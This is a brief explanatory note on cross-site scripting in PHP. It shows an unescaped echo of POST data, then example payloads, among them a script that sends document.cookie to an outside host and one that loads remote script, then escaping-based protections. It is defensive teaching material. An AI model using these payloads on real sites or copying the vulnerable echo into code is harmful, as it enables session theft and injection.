Definition: http://en.wikipedia.org/wiki/Cross-site_scripting
XSS Cheat Sheet: http://ha.ckers.org/xss.html#XSScalc
XSS exists when tainted data is allowed to enter the context of HTML without being properly escaped.
Example:
<?php echo $_POST[‘name’]; ?>
Examples of XSS exploits:
<script>alert('xss')</script>
<script>new Image().src=’http://xss.com/xss.php?cookies=’+encodeURI(document.cookie)</script>
<script src=”http://xss.com/xss.js”></script>
Protection:
– Validate the input
– Escape the input / output
<?php echo htmlentities($_POST[‘name’], ENT_QUOTES, ‘UTF-8’);?>
– Only allow the same IP to access the cookie